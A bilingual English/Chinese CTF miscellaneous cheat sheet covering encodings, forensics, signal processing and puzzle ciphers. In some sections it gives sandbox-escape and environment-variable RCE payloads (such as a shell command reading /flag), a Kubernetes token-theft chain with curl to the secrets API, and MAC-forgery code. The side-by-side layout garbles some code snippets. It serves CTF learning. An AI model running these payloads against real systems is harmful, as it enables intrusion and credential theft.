ctf-misc
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseCTF Miscellaneous
CTF杂项挑战速查
Quick reference for miscellaneous CTF challenges. Each technique has a one-liner here; see supporting files for full details.
本文是CTF杂项挑战的快速参考手册,每种技巧以单行形式呈现,详细内容请查阅配套文件。
Additional Resources
额外参考资源
- pyjails.md - Python jail/sandbox escape techniques
- bashjails.md - Bash jail/restricted shell escape techniques
- encodings.md - Encodings, QR codes, audio, esolangs, SHA-256 length extension, UTF-16 tricks
- rf-sdr.md - RF/SDR/IQ signal processing (QAM-16, carrier recovery, timing sync)
- dns.md - DNS exploitation (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling)
- games-and-vms.md - WASM patching, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC
- pyjails.md - Python沙箱逃逸技巧
- bashjails.md - Bash受限shell逃逸技巧
- encodings.md - 编码、二维码、音频、小众编程语言、SHA-256长度扩展攻击、UTF-16技巧
- rf-sdr.md - RF/SDR/IQ信号处理(QAM-16、载波恢复、时序同步)
- dns.md - DNS利用(ECS欺骗、NSEC遍历、IXFR、DNS重绑定、DNS隧道)
- games-and-vms.md - WASM补丁、PyInstaller逆向、marshal分析、Python环境RCE、Z3约束求解、K8s RBAC绕过
General Tips
通用技巧
- Read all provided files carefully
- Check file metadata, hidden content, encoding
- Power Automate scripts may hide API calls
- Use binary search when guessing multiple answers
- 仔细阅读所有提供的文件
- 检查文件元数据、隐藏内容和编码格式
- Power Automate脚本可能隐藏API调用
- 猜测多答案时使用二分查找法
Common Encodings
常见编码解码
bash
undefinedbash
undefinedBase64
Base64
echo "encoded" | base64 -d
echo "encoded" | base64 -d
Base32 (A-Z2-7=)
Base32 (A-Z2-7=)
echo "OBUWG32D..." | base32 -d
echo "OBUWG32D..." | base32 -d
Hex
Hex
echo "68656c6c6f" | xxd -r -p
echo "68656c6c6f" | xxd -r -p
ROT13
ROT13
echo "uryyb" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
**Identify by charset:**
- Base64: `A-Za-z0-9+/=`
- Base32: `A-Z2-7=` (no lowercase)
- Hex: `0-9a-fA-F`
See [encodings.md](encodings.md) for Caesar brute force, URL encoding, and full details.echo "uryyb" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
**通过字符集识别编码:**
- Base64: `A-Za-z0-9+/=`
- Base32: `A-Z2-7=`(仅大写)
- Hex: `0-9a-fA-F`
详细的凯撒密码暴力破解、URL编码等内容请查阅[encodings.md](encodings.md)。IEEE-754 Float Encoding (Data Hiding)
IEEE-754浮点编码(数据隐藏)
Pattern (Floating): Numbers are float32 values hiding raw bytes.
Key insight: A 32-bit float is just 4 bytes interpreted as a number. Reinterpret as raw bytes -> ASCII.
python
import struct
floats = [1.234e5, -3.456e-7, ...] # Whatever the challenge gives
flag = b''
for f in floats:
flag += struct.pack('>f', f)
print(flag.decode())Variations: Double , little-endian , mixed. See encodings.md for CyberChef recipe.
'>d''<f'特征: 以float32数值形式隐藏原始字节数据。
核心思路: 32位浮点数本质是4字节数据的另一种解读方式,将其重新解析为原始字节即可转换为ASCII字符。
python
import struct
floats = [1.234e5, -3.456e-7, ...] # 挑战提供的数值
flag = b''
for f in floats:
flag += struct.pack('>f', f)
print(flag.decode())变体: 双精度浮点数使用,小端序使用,也存在混合格式。CyberChef对应处理配方请查阅encodings.md。
'>d''<f'USB Mouse PCAP Reconstruction
USB鼠标流量包还原
Pattern (Hunt and Peck): USB HID mouse traffic captures on-screen keyboard typing.
Workflow:
- Open PCAP in Wireshark -- identify USBPcap with HID interrupt transfers
- Identify device (Device Descriptor -> manufacturer/product)
- Use USB-Mouse-Pcap-Visualizer:
github.com/WangYihang/USB-Mouse-Pcap-Visualizer - Extract click coordinates (falling edges of )
left_button_holding - Plot clicks on scatter plot with matplotlib
- Overlay on image of Windows On-Screen Keyboard
- Animate clicks in order to read typed text
Key details:
- Mouse reports relative coordinates (deltas), not absolute
- Cumulative sum of deltas gives position track
- Rising/falling edges of button state = click start/end
- Need to scale/stretch overlay to match OSK layout
python
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('mouse_data.csv')特征: USB HID鼠标流量包记录了屏幕键盘的输入操作。
操作流程:
- 用Wireshark打开PCAP包,识别包含HID中断传输的USBPcap流量
- 识别设备(设备描述符 -> 制造商/产品信息)
- 使用USB-Mouse-Pcap-Visualizer工具:
github.com/WangYihang/USB-Mouse-Pcap-Visualizer - 提取点击坐标(的下降沿)
left_button_holding - 用matplotlib将点击坐标绘制成散点图
- 将散点图叠加在Windows屏幕键盘的图片上
- 按顺序播放点击动画以读取输入的文本
关键细节:
- 鼠标报告的是相对坐标(增量值),而非绝对坐标
- 增量值的累计和即为位置轨迹
- 按键状态的上升/下降沿对应点击的开始/结束
- 需要调整叠加层的缩放比例以匹配屏幕键盘布局
python
import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv('mouse_data.csv')Find click positions (falling edges)
筛选点击位置(按键状态下降沿)
clicks = df[df['left_button_holding'].shift(1) == True & (df['left_button_holding'] == False)]
clicks = df[(df['left_button_holding'].shift(1) == True) & (df['left_button_holding'] == False)]
Cumulative position from relative deltas
通过相对增量计算累计位置
x_pos = df['x'].cumsum()
y_pos = df['y'].cumsum()
x_pos = df['x'].cumsum()
y_pos = df['y'].cumsum()
Plot clicks over OSK image
在屏幕键盘图片上绘制点击点
plt.scatter(click_x, click_y, c='red', s=50)
undefinedplt.scatter(click_x, click_y, c='red', s=50)
undefinedFile Type Detection
文件类型检测
bash
file unknown_file
xxd unknown_file | head
binwalk unknown_filebash
file unknown_file
xxd unknown_file | head
binwalk unknown_fileArchive Extraction
压缩包解压
bash
7z x archive.7z # Universal
tar -xzf archive.tar.gz # Gzip
tar -xjf archive.tar.bz2 # Bzip2
tar -xJf archive.tar.xz # XZbash
7z x archive.7z # 通用解压命令
tar -xzf archive.tar.gz # Gzip格式
tar -xjf archive.tar.bz2 # Bzip2格式
tar -xJf archive.tar.xz # XZ格式Nested Archive Script
嵌套压缩包自动解压脚本
bash
while f=$(ls *.tar* *.gz *.bz2 *.xz *.zip *.7z 2>/dev/null|head -1) && [ -n "$f" ]; do
7z x -y "$f" && rm "$f"
donebash
while f=$(ls *.tar* *.gz *.bz2 *.xz *.zip *.7z 2>/dev/null|head -1) && [ -n "$f" ]; do
7z x -y "$f" && rm "$f"
doneQR Codes
二维码处理
bash
zbarimg qrcode.png # Decode
qrencode -o out.png "data"See encodings.md for QR structure, repair techniques, and chunk reassembly.
bash
zbarimg qrcode.png # 解码二维码
qrencode -o out.png "data"二维码结构、修复技巧和分片重组等内容请查阅encodings.md。
Audio Challenges
音频类挑战
bash
sox audio.wav -n spectrogram # Visual data
qsstv # SSTV decoderbash
sox audio.wav -n spectrogram # 生成频谱图分析视觉数据
qsstv # SSTV信号解码器RF / SDR / IQ Signal Processing
RF / SDR / IQ信号处理
See rf-sdr.md for full details (IQ formats, QAM-16 demod, carrier/timing recovery).
Quick reference:
- cf32: | cs16: int16 reshape(-1,2) | cu8: RTL-SDR raw
np.fromfile(path, dtype=np.complex64) - Circles in constellation = frequency offset; Spirals = offset + time-varying phase
- 4-fold ambiguity in DD carrier recovery - try 0/90/180/270 rotation
详细内容请查阅rf-sdr.md(IQ格式、QAM-16解调、载波/时序恢复)。
速查要点:
- cf32格式:| cs16格式:int16类型数据reshape(-1,2) | cu8格式:RTL-SDR原始数据
np.fromfile(path, dtype=np.complex64) - 星座图中的圆形图案代表频率偏移;螺旋图案代表频率偏移加时变相位
- 判决反馈载波恢复存在4倍模糊性,可尝试0/90/180/270度旋转
pwntools Interaction
pwntools交互脚本
python
from pwn import *
r = remote('host', port)
r.recvuntil(b'prompt: ')
r.sendline(b'answer')
r.interactive()python
from pwn import *
r = remote('host', port)
r.recvuntil(b'prompt: ')
r.sendline(b'answer')
r.interactive()Python Jail Quick Reference
Python沙箱速查
Enumerate functions:
python
for c in string.printable:
result = test(f"{c}()")
if "error" not in result.lower():
print(f"Found: {c}()")Oracle pattern (L, Q, S functions):
python
flag_len = int(test("L()"))
for i in range(flag_len):
for c in range(32, 127):
if query(i, c) == 0:
flag += chr(c)
breakBypass character restrictions:
python
undefined枚举可用函数:
python
for c in string.printable:
result = test(f"{c}()")
if "error" not in result.lower():
print(f"Found: {c}()")Oracle模式(L、Q、S函数):
python
flag_len = int(test("L()"))
for i in range(flag_len):
for c in range(32, 127):
if query(i, c) == 0:
flag += chr(c)
break绕过字符限制:
python
undefinedWalrus operator
海象运算符
(abcdef := "new_allowed_chars")
(abcdef := "new_allowed_chars")
Octal escapes
八进制转义
'\141' = 'a'
**Decorator bypass (ast.Call banned, no quotes, no `=`):**
```python'\141' = 'a'
**装饰器绕过(ast.Call被禁用,无引号,无`=`):**
```pythonDecorators = function calls + assignment without ast.Call or =
装饰器 = 函数调用 + 无ast.Call或=
的赋值
=function.name = strings without quotes
function.name = 无需引号的字符串
See pyjails.md "Decorator-Based Escape" for full technique
完整技巧请查阅pyjails.md中的「基于装饰器的逃逸方法」
@import
@func.class.dict[name.name].get # name extractor
def os():
0
@import
@func.class.dict[name.name].get # 名称提取器
def os():
0
Result: os = import("os")
执行结果:os = import("os")
**String join bypass (`+` blocked):** `open(''.join(['fl','ag.txt'])).read()` -- see [pyjails.md](pyjails.md) for more.
**字符串拼接绕过(`+`被禁用):** `open(''.join(['fl','ag.txt'])).read()` -- 更多技巧请查阅[pyjails.md](pyjails.md)。Z3 Constraint Solving
Z3约束求解
python
from z3 import *
flag = [BitVec(f'f{i}', 8) for i in range(FLAG_LEN)]
s = Solver()
s.add(flag[0] == ord('f')) # Known prefixpython
from z3 import *
flag = [BitVec(f'f{i}', 8) for i in range(FLAG_LEN)]
s = Solver()
s.add(flag[0] == ord('f')) # 已知前缀Add constraints...
添加约束条件...
if s.check() == sat:
print(bytes([s.model()[f].as_long() for f in flag]))
See [games-and-vms.md](games-and-vms.md) for YARA rules with Z3 and type systems as constraints.if s.check() == sat:
print(bytes([s.model()[f].as_long() for f in flag]))
结合Z3的YARA规则和类型系统约束等内容请查阅[games-and-vms.md](games-and-vms.md)。Hash Identification
哈希算法识别
By constants:
- MD5:
0x67452301 - SHA-256:
0x6a09e667 - MurmurHash64A:
0xC6A4A7935BD1E995
通过常量识别:
- MD5:
0x67452301 - SHA-256:
0x6a09e667 - MurmurHash64A:
0xC6A4A7935BD1E995
SHA-256 Length Extension Attack
SHA-256长度扩展攻击
Pattern: MAC = with known message and hash. Forge valid MAC without knowing SECRET.
SHA-256(SECRET || message)python
import hlextend
sha = hlextend.new('sha256')
new_data = sha.extend(b'extension', b'original_message', len_secret, known_hash_hex)
new_hash = sha.hexdigest()Vulnerable: SHA-256, MD5, SHA-1. NOT vulnerable: HMAC, SHA-3. See encodings.md for full attack steps.
特征: MAC值为,已知message和哈希值,在未知SECRET的情况下伪造合法MAC。
SHA-256(SECRET || message)python
import hlextend
sha = hlextend.new('sha256')
new_data = sha.extend(b'extension', b'original_message', len_secret, known_hash_hex)
new_hash = sha.hexdigest()易受攻击的算法:SHA-256、MD5、SHA-1。不易受攻击的算法:HMAC、SHA-3。完整攻击步骤请查阅encodings.md。
PyInstaller Extraction
PyInstaller逆向提取
bash
python pyinstxtractor.py packed.exebash
python pyinstxtractor.py packed.exeLook in packed.exe_extracted/
查看packed.exe_extracted/目录下的内容
See [games-and-vms.md](games-and-vms.md) for opcode remapping and marshal analysis.
操作码重映射和marshal分析等内容请查阅[games-and-vms.md](games-and-vms.md)。Marshal Code Analysis
Marshal代码分析
python
import marshal, dis
with open('file.bin', 'rb') as f:
code = marshal.load(f)
dis.dis(code)python
import marshal, dis
with open('file.bin', 'rb') as f:
code = marshal.load(f)
dis.dis(code)Python Environment RCE
Python环境RCE
bash
PYTHONWARNINGS=ignore::antigravity.Foo::0
BROWSER="/bin/sh -c 'cat /flag' %s"See games-and-vms.md for other dangerous env vars and full explanation.
bash
PYTHONWARNINGS=ignore::antigravity.Foo::0
BROWSER="/bin/sh -c 'cat /flag' %s"其他危险环境变量和完整说明请查阅games-and-vms.md。
WASM Game Exploitation via Patching
基于补丁的WASM游戏利用
Pattern: Game with unbeatable AI in WASM. Patch minimax to play badly, proofs still validate.
bash
wasm2wat main.wasm -o main.wat特征: 游戏的WASM文件中包含无法击败的AI,通过补丁修改minimax算法使其表现失常,同时保持验证逻辑有效。
bash
wasm2wat main.wasm -o main.watFlip bestScore init and comparison operator
修改bestScore的初始值和比较运算符
wat2wasm main.wat -o main_patched.wasm
See [games-and-vms.md](games-and-vms.md) for full exploitation code and JS integration.wat2wasm main.wat -o main_patched.wasm
完整利用代码和JS集成方法请查阅[games-and-vms.md](games-and-vms.md)。Floating-Point Precision Exploitation
浮点精度漏洞利用
Pattern (Spare Me Some Change): Trading/economy games where large multipliers amplify tiny floating-point errors.
Key insight: When decimal values (0.01-0.99) are multiplied by large numbers (e.g., 1e15), floating-point representation errors create fractional remainders that can be exploited.
特征(零钱漏洞): 交易/经济类游戏中,大乘数会放大微小的浮点表示误差。
核心思路: 当十进制数值(0.01-0.99)乘以大数(如1e15)时,浮点表示误差会产生可被利用的小数余数。
Finding Exploitable Values
寻找可利用的数值
python
mult = 1000000000000000 # 10^15python
mult = 1000000000000000 # 10^15Find values where multiplication creates useful fractional errors
寻找乘以大数后产生有用小数误差的数值
for i in range(1, 100):
x = i / 100.0
result = x * mult
frac = result - int(result)
if frac > 0:
print(f'x={x}: {result} (fraction={frac})')
for i in range(1, 100):
x = i / 100.0
result = x * mult
frac = result - int(result)
if frac > 0:
print(f'x={x}: {result} (小数部分={frac})')
Common values with positive fractions:
常见的正小数误差数值:
0.07 -> 70000000000000.0078125
0.07 -> 70000000000000.0078125
0.14 -> 140000000000000.015625
0.14 -> 140000000000000.015625
0.27 -> 270000000000000.03125
0.27 -> 270000000000000.03125
0.56 -> 560000000000000.0625
0.56 -> 560000000000000.0625
undefinedundefinedExploitation Strategy
利用策略
- Identify the constraint: Need AND
balance >= priceinventory >= fee - Find favorable FP error: Value where has positive fraction
x * mult - Key trick: Sell the INTEGER part of inventory, keeping the fractional "free money"
Example (time-travel trading game):
Initial: balance=5.00, inventory=0.00, flag_price=5.00, fee=0.05
Multiplier: 1e15 (time travel)- 识别约束条件:需要满足且
余额 >= 目标价格库存 >= 手续费 - 寻找有利的浮点误差:找到产生正小数部分的数值
x * mult - 关键技巧:仅出售库存的整数部分,保留小数部分作为“免费资产”
示例(时间旅行交易游戏):
初始状态:余额=5.00,库存=0.00, flag价格=5.00,手续费=0.05
乘数:1e15(时间旅行)Buy 0.56, travel through time:
购买0.56,进行时间旅行:
balance = (5.0 - 0.56) * 1e15 = 4439999999999999.5
inventory = 0.56 * 1e15 = 560000000000000.0625
余额 = (5.0 - 0.56) * 1e15 = 4439999999999999.5
库存 = 0.56 * 1e15 = 560000000000000.0625
Sell exactly 560000000000000 (integer part):
出售库存的整数部分560000000000000:
balance = 4439999999999999.5 + 560000000000000 = 5000000000000000.0 (FP rounds!)
inventory = 560000000000000.0625 - 560000000000000 = 0.0625 > 0.05 fee
余额 = 4439999999999999.5 + 560000000000000 = 5000000000000000.0(浮点自动舍入!)
库存 = 560000000000000.0625 - 560000000000000 = 0.0625 > 0.05手续费
Now: balance >= flag_price AND inventory >= fee
最终状态:余额 >= flag价格 且 库存 >= 手续费
undefinedundefinedWhy It Works
原理说明
- Float64 has ~15-16 significant digits precision
- loses precision -> rounds to exact 5e15 when added
(5.0 - 0.56) * 1e15 - keeps the 0.0625 fraction as "free inventory"
0.56 * 1e15 - The asymmetric rounding gives you slightly more total value than you started with
- Float64类型约有15-16位有效数字精度
- 会丢失精度,与整数部分相加后舍入为精确的5e15
(5.0 - 0.56) * 1e15 - 保留了0.0625的小数部分作为“免费库存”
0.56 * 1e15 - 不对称的舍入操作使总价值略高于初始值
Red Flags in Challenges
挑战中的预警信号
- "Time travel amplifies everything" (large multipliers)
- Trading games with buy/sell + special actions
- Decimal currency with fees or thresholds
- "No decimals allowed" after certain operations (forces integer transactions)
- Starting values that seem impossible to win with normal math
- 描述中提到“时间旅行会放大所有数值”(大乘数)
- 包含买卖操作和特殊动作的交易类游戏
- 带手续费或阈值的十进制货币系统
- 某些操作后“不允许使用小数”(强制整数交易)
- 初始数值用常规数学方法无法达成目标
Quick Test Script
快速测试脚本
python
def find_exploit(mult, balance_needed, inventory_needed):
"""Find x where selling int(x*mult) gives balance>=needed with inv>=needed"""
for i in range(1, 500):
x = i / 100.0
if x >= 5.0: # Can't buy more than balance
break
inv_after = x * mult
bal_after = (5.0 - x) * mult
# Sell integer part of inventory
sell = int(inv_after)
final_bal = bal_after + sell
final_inv = inv_after - sell
if final_bal >= balance_needed and final_inv >= inventory_needed:
print(f'EXPLOIT: buy {x}, sell {sell}')
print(f' final_balance={final_bal}, final_inventory={final_inv}')
return x
return Nonepython
def find_exploit(mult, balance_needed, inventory_needed):
"""寻找x,使得出售int(x*mult)后余额>=目标值且库存>=目标值"""
for i in range(1, 500):
x = i / 100.0
if x >= 5.0: # 购买金额不能超过初始余额
break
inv_after = x * mult
bal_after = (5.0 - x) * mult
# 出售库存的整数部分
sell = int(inv_after)
final_bal = bal_after + sell
final_inv = inv_after - sell
if final_bal >= balance_needed and final_inv >= inventory_needed:
print(f'EXPLOIT: 购买{x},出售{sell}')
print(f' 最终余额={final_bal}, 最终库存={final_inv}')
return x
return NoneExample usage:
示例调用:
find_exploit(1e15, 5e15, 0.05) # Returns 0.56
undefinedfind_exploit(1e15, 5e15, 0.05) # 返回0.56
undefinedKubernetes RBAC Bypass
Kubernetes RBAC绕过
Pattern (CTFaaS): Container deployer with claimed ServiceAccount isolation.
Attack chain: Deploy probe -> read SA token -> impersonate deployer -> hostPath mount -> extract kubeconfig -> read secrets.
bash
undefined特征(CTFaaS场景): 容器部署器声称实现了ServiceAccount隔离。
攻击链: 部署探针 -> 读取SA令牌 -> 模拟部署器身份 -> 挂载hostPath -> 提取kubeconfig -> 读取密钥。
bash
undefinedFrom inside pod:
在Pod内部执行:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k -H "Authorization: Bearer $TOKEN"
https://kubernetes.default.svc/api/v1/namespaces/hidden/secrets/flag
https://kubernetes.default.svc/api/v1/namespaces/hidden/secrets/flag
See [games-and-vms.md](games-and-vms.md) for full attack chain and K8s privilege escalation checklist.TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k -H "Authorization: Bearer $TOKEN"
https://kubernetes.default.svc/api/v1/namespaces/hidden/secrets/flag
https://kubernetes.default.svc/api/v1/namespaces/hidden/secrets/flag
完整攻击链和K8s权限提升检查清单请查阅[games-and-vms.md](games-and-vms.md)。3D Printer Video Nozzle Tracking (LACTF 2026)
3D打印机视频喷嘴追踪(LACTF 2026)
Pattern (flag-irl): Video of 3D printer fabricating nameplate. Flag is the printed text.
Technique: Track nozzle X/Y positions from video frames, filter for print moves (top/text layer only), plot 2D histogram to reveal letter shapes:
python
undefined特征(物理世界flag): 3D打印机制作铭牌的视频,flag为打印的文字。
技巧: 从视频帧中追踪喷嘴的X/Y位置,过滤出打印移动(仅顶层/文字层),绘制二维直方图以还原字母形状:
python
undefined1. Identify text layer frames (e.g., frames 26100-28350)
1. 识别文字层对应的帧(例如26100-28350帧)
2. Track print head X position (physical X-axis)
2. 追踪打印头的X位置(物理X轴)
3. Track bed X position (physical Y-axis from camera angle)
3. 追踪打印床的X位置(从相机角度看的物理Y轴)
4. Filter for moves with extrusion (head moving while printing)
4. 过滤出挤出耗材时的移动(打印头移动同时耗材挤出)
5. Plot as 2D scatter/histogram -> letters appear
5. 绘制二维散点/直方图 -> 还原字母
undefinedundefinedUseful One-Liners
实用单行命令
bash
grep -rn "flag{" .
strings file | grep -i flag
python3 -c "print(int('deadbeef', 16))"bash
grep -rn "flag{" .
strings file | grep -i flag
python3 -c "print(int('deadbeef', 16))"Keyboard Shift Cipher
键盘移位密码
Pattern (Frenzy): Characters shifted left/right on QWERTY keyboard layout.
Identification: dCode Cipher Identifier suggests "Keyboard Shift Cipher"
Decoding: Use dCode Keyboard Shift Cipher with automatic mode.
特征(Frenzy挑战): 字符在QWERTY键盘布局上左右移位。
识别方法: dCode密码识别工具提示“Keyboard Shift Cipher”
解码方法: 使用dCode键盘移位密码工具的自动模式。
Pigpen / Masonic Cipher
猪圈密码/共济会密码
Pattern (Working For Peanuts): Geometric symbols representing letters based on grid positions.
Identification: Angular/geometric symbols, challenge references "Peanuts" comic (Charlie Brown), "dusty looking crypto"
Decoding: Map symbols to Pigpen grid positions, or use online decoder.
特征(Working For Peanuts挑战): 基于网格位置的几何符号代表字母。
识别方法: 出现角状/几何符号,挑战提及“Peanuts”漫画(查理·布朗)、“看起来陈旧的密码”
解码方法: 将符号映射到猪圈密码的网格位置,或使用在线解码工具。
ASCII in Numeric Data Columns
数值列中的ASCII字符
Pattern (Cooked Books): CSV/spreadsheet numeric values (48-126) are ASCII character codes.
python
import csv
with open('data.csv') as f:
reader = csv.DictReader(f)
flag = ''.join(chr(int(row['Times Borrowed'])) for row in reader)
print(flag)CyberChef: "From Decimal" recipe with line feed delimiter.
特征(Cooked Books挑战): CSV/电子表格中的数值(48-126)对应ASCII字符编码。
python
import csv
with open('data.csv') as f:
reader = csv.DictReader(f)
flag = ''.join(chr(int(row['Times Borrowed'])) for row in reader)
print(flag)CyberChef处理: 使用“从十进制”配方,分隔符为换行符。
Backdoor Detection in Source Code
源代码中的后门检测
Pattern (Rear Hatch): Hidden command prefix triggers call.
system()Common patterns:
- -> runs
strncmp(input, "exec:", 5)system(input + 5) - Hex-encoded comparison strings: = "exec:"
\x65\x78\x65\x63\x3a - Hidden conditions in maintenance/admin functions
特征(Rear Hatch挑战): 隐藏的命令前缀会触发调用。
system()常见模式:
- -> 执行
strncmp(input, "exec:", 5)system(input + 5) - 十六进制编码的比较字符串:= "exec:"
\x65\x78\x65\x63\x3a - 维护/管理函数中的隐藏条件
DNS Exploitation Techniques
DNS利用技巧
See dns.md for full details (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling).
Quick reference:
- ECS spoofing: - try leet-speak IPs (1337)
dig @server flag.example.com TXT +subnet=10.13.37.1/24 - NSEC walking: Follow NSEC chain to enumerate DNSSEC zones
- IXFR: when AXFR is blocked
dig @server domain IXFR=0 - DNS rebinding: Low-TTL alternating resolution to bypass same-origin
- DNS tunneling: Data exfiltrated via subdomain queries or TXT responses
完整内容请查阅dns.md(ECS欺骗、NSEC遍历、IXFR、DNS重绑定、DNS隧道)。
速查要点:
- ECS欺骗:- 尝试使用leet风格IP(1337)
dig @server flag.example.com TXT +subnet=10.13.37.1/24 - NSEC遍历:跟随NSEC链枚举DNSSEC区域
- IXFR查询:当AXFR被阻止时使用
dig @server domain IXFR=0 - DNS重绑定:低TTL交替解析以绕过同源策略
- DNS隧道:通过子域名查询或TXT响应泄露数据
Unicode Steganography
Unicode隐写术
Variation Selectors (U+FE00-U+FE0F)
变体选择符(U+FE00-U+FE0F)
Pattern (Seen, Nullcon 2026): Zero-width variation selectors carry data through codepoint values.
python
undefined特征(Seen, Nullcon 2026挑战): 零宽变体选择符通过编码点值携带数据。
python
undefinedExtract hidden data from variation selectors after visible emoji
从可见emoji后的变体选择符中提取隐藏数据
data = open('README.md', 'r').read().strip()
hidden = data[1:] # Skip visible emoji character
flag = ''.join(chr((ord(c) - 0xE0100) + 16) for c in hidden)
undefineddata = open('README.md', 'r').read().strip()
hidden = data[1:] # 跳过可见的emoji字符
flag = ''.join(chr((ord(c) - 0xE0100) + 16) for c in hidden)
undefinedVariation Selectors Supplement (U+E0100-U+E01EF)
补充变体选择符(U+E0100-U+E01EF)
Pattern (emoji, Nullcon 2026): Characters from Variation Selectors Supplement encode ASCII.
python
undefined特征(emoji, Nullcon 2026挑战): 补充变体选择符中的字符用于编码ASCII。
python
undefinedFormula: ASCII value = (codepoint - 0xE0100) + 16
公式:ASCII值 = (编码点 - 0xE0100) + 16
flag = ''
for c in hidden_chars:
val = (ord(c) - 0xE0100) + 16
flag += chr(val)
**Detection:** Characters appear invisible but have non-zero length. Check with `[hex(ord(c)) for c in text]` -- look for codepoints in `0xE0100-0xE01EF` or `0xFE00-0xFE0F` range.flag = ''
for c in hidden_chars:
val = (ord(c) - 0xE0100) + 16
flag += chr(val)
**检测方法:** 字符看似不可见但长度非零。使用`[hex(ord(c)) for c in text]`检查,寻找`0xE0100-0xE01EF`或`0xFE00-0xFE0F`范围内的编码点。UTF-16 Endianness Reversal
UTF-16字节序反转
Pattern (endians): Text "turned to Japanese" -- mojibake from UTF-16 endianness mismatch.
python
undefined特征(endians挑战): 文本看起来像“日文”——由UTF-16字节序不匹配导致的乱码。
python
undefinedIf encoded as UTF-16-LE but decoded as UTF-16-BE:
如果文本以UTF-16-LE编码但被解码为UTF-16-BE:
fixed = mojibake.encode('utf-16-be').decode('utf-16-le')
**Identification:** CJK characters, challenge mentions "translation" or "endian". See [encodings.md](encodings.md) for details.fixed = mojibake.encode('utf-16-be').decode('utf-16-le')
**识别方法:** 出现CJK字符,挑战提及“翻译”或“字节序”。详细内容请查阅[encodings.md](encodings.md)。Cipher Identification Workflow
密码识别流程
- ROT13 - Challenge mentions "ROT", text looks like garbled English
- Base64 - , title hints "64"
A-Za-z0-9+/= - Base32 - uppercase only
A-Z2-7= - Atbash - Title hints (Abash/Atbash), preserves spaces, 1:1 substitution
- Pigpen - Geometric symbols on grid
- Keyboard Shift - Text looks like adjacent keys pressed
- Substitution - Frequency analysis applicable
Auto-identify: dCode Cipher Identifier
- ROT13 - 挑战提及“ROT”,文本看起来像乱码的英文
- Base64 - 字符集为,标题暗示“64”
A-Za-z0-9+/= - Base32 - 仅包含大写
A-Z2-7= - Atbash - 标题暗示(Abash/Atbash),保留空格,一对一替换
- 猪圈密码 - 网格状几何符号
- 键盘移位密码 - 文本看起来像按了相邻的按键
- 替换密码 - 可应用频率分析
自动识别工具: dCode密码识别器